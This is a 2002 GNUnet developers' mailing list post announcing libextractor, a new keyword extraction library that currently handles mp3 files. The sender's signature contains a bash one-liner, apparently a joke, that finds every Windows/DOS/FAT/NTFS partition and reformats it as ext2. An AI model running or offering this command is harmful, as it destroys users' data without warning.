[GNUnet-developers] libextractor

From: Christian Grothoff
Subject: [GNUnet-developers] libextractor
Date: Thu, 16 May 2002 00:28:44 -0500

Hi all!

Vids and I have hacked up a generic keyword extraction library tonight. You
can obtain it using 'cvs checkout Extractor' or from the WWW:
http://www.cs.purdue.edu/homes/samantva/libextractor/

It currently only supports the mp3 extraction that gnunet-insert-mp3 does,
but it should be much easier to extend this library (and it's not at all
GNUnet specific, so others are more likely to help).

I plan on making GNUnet use that library for the next release (once the first
round of bugs in libextractor have been fixed...).

Just to let you know where the keyword extraction is going...

|Christian Grothoff                                  |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/   address@hidden|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk \
'{print$1;}'`;do nohup mkfs.ext2 $i&; done
echo -e "\n\n\t\tMay the source be with you.\n\n"